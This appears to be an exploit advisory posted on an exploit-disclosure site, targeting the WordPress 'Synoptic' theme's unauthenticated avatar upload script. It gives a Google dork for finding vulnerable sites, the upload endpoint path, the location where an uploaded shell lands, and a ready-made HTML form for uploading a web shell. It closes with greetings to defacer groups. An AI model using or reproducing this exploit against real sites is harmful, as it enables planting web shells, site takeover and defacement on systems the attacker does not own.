Wordpress Themes Synoptic Shell Upload Vulnerability | CSRF

Published
Credit
Risk
2017.03.11
Berandal | OWL SQUAD
Medium
CWE
CVE
Local
Remote
CWE-352
N/A
No
Yes
Dork: inurl:/wp-content/themes/synoptic/

#################################################################################
# Wordpress Themes Synoptic Shell Upload Vulnerability | CSRF
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/synoptic/
# Tested on: Win 7, Linux
# Blog : http://www.maxteroit.com/
#################################################################################

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

# [!] Exploit : http://127.0.0.1/wp-content/themes/synoptic/lib/avatarupload/upload.php

# [!] File Location : http://127.0.0.1/wp-content/uploads/markets/avatars/shellname

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/synoptic/lib/avatarupload/upload.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# [*] ABOUT:
#################################################################################
# Facebook: https://www.facebook.com/owlsquad.id
# Twitter: https://www.twitter.com/id_berandal
# Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.
#################################################################################

References:

http://www.maxteroit.com/
https://www.facebook.com/owlsquad.id/
https://twitter.com/id_berandal


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com